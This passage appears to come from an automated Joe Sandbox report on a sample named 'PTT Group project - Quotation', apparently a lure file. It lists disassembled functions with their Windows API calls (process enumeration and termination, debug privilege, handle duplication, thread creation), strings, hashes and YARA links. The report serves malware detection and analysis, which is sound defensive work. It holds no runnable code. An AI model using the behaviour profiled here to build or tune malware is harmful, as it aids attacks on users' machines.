DestroyIcon.USER32(?), ref: 0094C5FB

Part of subcall function 0099A71E: DeleteObject.GDI32(00000000), ref: 0099A757

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 45153c8b64ef86c131dea1f2258a18fe571bd857980e47e73206366b57ec20c2
Instruction ID: c0be6a45354243f0d0d4fa3ab207ea4e0a3ecae1214a6aca32ec809b52f40bb4
Opcode Fuzzy Hash: 45153c8b64ef86c131dea1f2258a18fe571bd857980e47e73206366b57ec20c2
Instruction Fuzzy Hash: A9518C74A59209AFDB24EF24CC45FAE77B9EB58310F104529F902D72A0DB74EDA0EB50

Function 00968E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00968A84,00000B00,?,?), ref: 00968E0C
HeapAlloc.KERNEL32(00000000,?,00968A84,00000B00,?,?), ref: 00968E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00968A84,00000B00,?,?), ref: 00968E28
GetCurrentProcess.KERNEL32(?,00000000,?,00968A84,00000B00,?,?), ref: 00968E30
DuplicateHandle.KERNEL32(00000000,?,00968A84,00000B00,?,?), ref: 00968E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00968A84,00000B00,?,?), ref: 00968E43
GetCurrentProcess.KERNEL32(00968A84,00000000,?,00968A84,00000B00,?,?), ref: 00968E4B
DuplicateHandle.KERNEL32(00000000,?,00968A84,00000B00,?,?), ref: 00968E4E
CreateThread.KERNEL32(00000000,00000000,00968E74,00000000,00000000,00000000), ref: 00968E68

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ba2f7d8260cbe46856c5f464162711f6e01029df016bbf9998e901494c868ad4
Instruction ID: 346624628530bcc90643c67021ff19aca3c4bcf9da6563d88c25dca566b6cd8f
Opcode Fuzzy Hash: ba2f7d8260cbe46856c5f464162711f6e01029df016bbf9998e901494c868ad4
Instruction Fuzzy Hash: 0E01BF75254304FFE720AB69DC4DF5B7B6CEB89715F104422FA05DB1A1CA719800DB64

Function 00989428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0098947C
VariantInit.OLEAUT32(?), ref: 0098954D
VariantInit.OLEAUT32(?), ref: 0098964E
VariantClear.OLEAUT32(?), ref: 00989658
VariantClear.OLEAUT32(?), ref: 009896B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00989631
Null Object assignment in FOR..IN loop, xrefs: 009894DD, 0098960B, 009896C3

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: e28b662ea082a9ff199e73e28af9a6d7122bf5561608822cc2ca1007446769a2
Instruction ID: 09f6d41fefb450761177c476057ba07e777cd19a49fc0e3bf0362508ca561b80
Opcode Fuzzy Hash: e28b662ea082a9ff199e73e28af9a6d7122bf5561608822cc2ca1007446769a2
Instruction Fuzzy Hash: 8291D071A00219AFDF24EFA5C848FBEBBB8EF85314F148559F905AB290D7749905CFA0

Function 00989A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00967652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0096758C,80070057,?,?,?,0096799D), ref: 0096766F
Part of subcall function 00967652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0096758C,80070057,?,?), ref: 0096768A
Part of subcall function 00967652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0096758C,80070057,?,?), ref: 00967698
Part of subcall function 00967652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0096758C,80070057,?), ref: 009676A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00989B1B
_memset.LIBCMT ref: 00989B28
_memset.LIBCMT ref: 00989C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00989C97
CoTaskMemFree.OLE32(?), ref: 00989CA2

Strings

NULL Pointer assignment, xrefs: 00989CF0

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: e45a613a78a9cfcf2480caba501b6dcff9562beeaadcde06cc6f91d979870d2b
Instruction ID: ce59cc349334dd7892938ba356ef926d595b4d399676e3dc9008eab729d4445c
Opcode Fuzzy Hash: e45a613a78a9cfcf2480caba501b6dcff9562beeaadcde06cc6f91d979870d2b
Instruction Fuzzy Hash: A1914871D0021DEBDB10DFA5DC84AEEBBB9BF48310F24415AF419A7281DB719A44CFA0

Function 00996FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00997093
SendMessageW.USER32(?,00001036,00000000,?), ref: 009970A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009970C1
_wcscat.LIBCMT ref: 0099711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00997133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00997161

Strings

SysListView32, xrefs: 00997065

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: e1206e1c63eefcca878ada149cf6d39bad14ab22cf3b32c9821237bee16f8b0b
Instruction ID: f11db68453914b404b2aeb91022b1b2749d92819fe2f7831f48646ad638a7e96
Opcode Fuzzy Hash: e1206e1c63eefcca878ada149cf6d39bad14ab22cf3b32c9821237bee16f8b0b
Instruction Fuzzy Hash: 30418271A14308AFEF219FA8CC85BEEB7ACEF48354F10452AF544E7191D6729D848B60

Function 0098EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00973E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00973EB6
Part of subcall function 00973E91: Process32FirstW.KERNEL32(00000000,?), ref: 00973EC4
Part of subcall function 00973E91: CloseHandle.KERNEL32(00000000), ref: 00973F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0098ECB8
GetLastError.KERNEL32 ref: 0098ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0098ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 0098ED77
GetLastError.KERNEL32(00000000), ref: 0098ED82
CloseHandle.KERNEL32(00000000), ref: 0098EDB7

Strings

SeDebugPrivilege, xrefs: 0098ECD6

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: d81dcbc1811787128c88dcd657d39a2f9be78f4e4d3f5593f13efe4135060224
Instruction ID: 4eca6f7fbf34edb052fcf0362113577ac6fca7530f0525ec526117489566e6c1
Opcode Fuzzy Hash: d81dcbc1811787128c88dcd657d39a2f9be78f4e4d3f5593f13efe4135060224
Instruction Fuzzy Hash: FE41AD717042009FDB14EF24CCA5FAEB7A5AF84714F188459F8469B3C2DB79AC48CB96

Function 00973226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 009732C5

Strings

question, xrefs: 0097327E
info, xrefs: 00973266
warning, xrefs: 009732AE
stop, xrefs: 00973296
blank, xrefs: 00973247

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 2bfcad03a88176d370cd1a19c0cace7fcd74ba9fa9ec071bd1ad515eda4edb48
Instruction ID: 88dd7b7fecd512c3d164fabd41aa1aac6137e8227a1e2a6015bcff6c486c85f8
Opcode Fuzzy Hash: 2bfcad03a88176d370cd1a19c0cace7fcd74ba9fa9ec071bd1ad515eda4edb48
Instruction Fuzzy Hash: 4E116D3364C356BBD7015B54DC43EAAB39CDF19774F10C02AF528A6183D6755F006BA6

Function 00974534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0097454E
LoadStringW.USER32(00000000), ref: 00974555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0097456B
LoadStringW.USER32(00000000), ref: 00974572
_wprintf.LIBCMT ref: 00974598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 009745B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00974593

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 55b807a16a8947c7922a2cd628a14d3034a9050a172782392710fa8595535596
Instruction ID: dba797ab80e29ea5668bffc03106722f84d9afee8e2847933ed0d2642c2d0bd1
Opcode Fuzzy Hash: 55b807a16a8947c7922a2cd628a14d3034a9050a172782392710fa8595535596
Instruction Fuzzy Hash: 4A014FF7908208BFE720A7A49D89EF6B76CD708301F0045A6BB49E2051EA749E858B71

Function 0099D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

GetSystemMetrics.USER32(0000000F), ref: 0099D78A
GetSystemMetrics.USER32(0000000F), ref: 0099D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0099D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0099DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0099DA24
ShowWindow.USER32(00000003,00000000), ref: 0099DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 0099DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 0099DA8B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 515baa353079f7a06905c6f8bb1a02ae397958bf800709e6f9d34fbbca9641e7
Instruction ID: 86ae717e827d8a0581823547cd1dbb1e738c01668f157cfed76acbb47c9b8fb7
Opcode Fuzzy Hash: 515baa353079f7a06905c6f8bb1a02ae397958bf800709e6f9d34fbbca9641e7
Instruction Fuzzy Hash: 50B19971602229EBDF14CF6DC9C57BD7BB5BF48701F08806AEC489B295D734A9A0DB60

Function 00912A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0094C417,00000004,00000000,00000000,00000000), ref: 00912ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0094C417,00000004,00000000,00000000,00000000,000000FF), ref: 00912B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0094C417,00000004,00000000,00000000,00000000), ref: 0094C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0094C417,00000004,00000000,00000000,00000000), ref: 0094C4D6

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e26ecd42ac9d882be2ee299f01bf6dcbd84cbb1bd285b9aaa183d395c427fa41
Instruction ID: 3a3c65715a416adf925fc95a7087a5abd7eccac42fb7b313622f664d78906313
Opcode Fuzzy Hash: e26ecd42ac9d882be2ee299f01bf6dcbd84cbb1bd285b9aaa183d395c427fa41
Instruction Fuzzy Hash: 85413E3131C7889EC7356B6C9E9CBFA7B99AF85300F14881EE047865F0D639A8D1D710

Function 00977368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0097737F

Part of subcall function 00930FF6: std::exception::exception.LIBCMT ref: 0093102C
Part of subcall function 00930FF6: __CxxThrowException@8.LIBCMT ref: 00931041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009773B6
EnterCriticalSection.KERNEL32(?), ref: 009773D2
_memmove.LIBCMT ref: 00977420
_memmove.LIBCMT ref: 0097743D
LeaveCriticalSection.KERNEL32(?), ref: 0097744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00977461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00977480

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 0ab94d36fcbd6287a77195691edad7ffc7a37d0c32c6bb106528d78461287c47
Instruction ID: f92fe8a013ca93f7573bb054d779fe5bc885d606f5cddc907b38f470728c3d3d
Opcode Fuzzy Hash: 0ab94d36fcbd6287a77195691edad7ffc7a37d0c32c6bb106528d78461287c47
Instruction Fuzzy Hash: B3316132904205EBDF10DF98DD85AAEBBB8EF84710F1441A6F904EB256DB309E14DBA0

Function 00996442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0099645A
GetDC.USER32(00000000), ref: 00996462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0099646D
ReleaseDC.USER32(00000000,00000000), ref: 00996479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009964B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009964C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00999299,?,?,000000FF,00000000,?,000000FF,?), ref: 00996500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00996520

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 78930b949166165d5a445f51571158d4aaf72aaa5c127b6eb0b5c6316b9beab6
Instruction ID: 5b69b52d97e6e59cf1a87a1cb246ce299addff30327e098c937572d540a2397d
Opcode Fuzzy Hash: 78930b949166165d5a445f51571158d4aaf72aaa5c127b6eb0b5c6316b9beab6
Instruction Fuzzy Hash: C8318B72214214BFEF108F58CC8AFEA7FADEF09765F040066FE08DA2A5C6759851CB60

Function 0096C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0096C087
_memcmp.LIBCMT ref: 0096C0A9
_memcmp.LIBCMT ref: 0096C0C1
_memcmp.LIBCMT ref: 0096C0D4
_memcmp.LIBCMT ref: 0096C0EE
_memcmp.LIBCMT ref: 0096C101
_memcmp.LIBCMT ref: 0096C119
_memcmp.LIBCMT ref: 0096C134

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a215e13290554e7fd85650f7ff1087c06fb70132e8b94f0355e68a5ed4f46b2e
Instruction ID: 1427f852229888bcfe7ecc3af09ed86b2f0b7587df245fd2c4c9bdad762b1774
Opcode Fuzzy Hash: a215e13290554e7fd85650f7ff1087c06fb70132e8b94f0355e68a5ed4f46b2e
Instruction Fuzzy Hash: 4621F6F5604205BBDA10A6258D43FBF339CAF923ACF040020FD4696293E756DE11C6E5

Function 0097ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

Part of subcall function 0092FEC6: _wcscpy.LIBCMT ref: 0092FEE9

_wcstok.LIBCMT ref: 0097EEFF
_wcscpy.LIBCMT ref: 0097EF8E
_memset.LIBCMT ref: 0097EFC1

Strings

X, xrefs: 0097EFFE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 41ec7a1f3b717305af94b30f3c7aa8a774d5ed0a41881ca137266cc8166105c7
Instruction ID: 8b77ca1126e78bc17800fd16a17195ef344e9be54069be4c8453801aed9a6b66
Opcode Fuzzy Hash: 41ec7a1f3b717305af94b30f3c7aa8a774d5ed0a41881ca137266cc8166105c7
Instruction Fuzzy Hash: 8CC15D716083459FC724EF64C895B9AB7E4EFC5310F04896DF899972A2DB30ED85CB82

Function 00911424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b52b029e51ad0c460d74bdd75cee844293ddcd1be66189e190ade890ab9d5c
Instruction ID: 49d916cf37871e8757439a789ee27b5661f29d1759f22a0c43c432bcf5f73af4
Opcode Fuzzy Hash: f7b52b029e51ad0c460d74bdd75cee844293ddcd1be66189e190ade890ab9d5c
Instruction Fuzzy Hash: 0C715D30A04109FFDB148F58CC85EFEBB79FF85314F148559FA15AA291C734AA91CBA4

Function 00986E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee0d7585812c07b773299a47d019f2c7666c62b42668930fabd6ca2e44e21ba4
Instruction ID: 9c8b9ecc2e11be8edee5afa494043e905e01c6630642f1a083e87b8038ac7a1b
Opcode Fuzzy Hash: ee0d7585812c07b773299a47d019f2c7666c62b42668930fabd6ca2e44e21ba4
Instruction Fuzzy Hash: AC61DC32608304ABC710EF64CC92FAFB7A9AFC4714F104919F5469B2A2DA30ED40CB92

Function 0099B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00FB5C58), ref: 0099B6A5
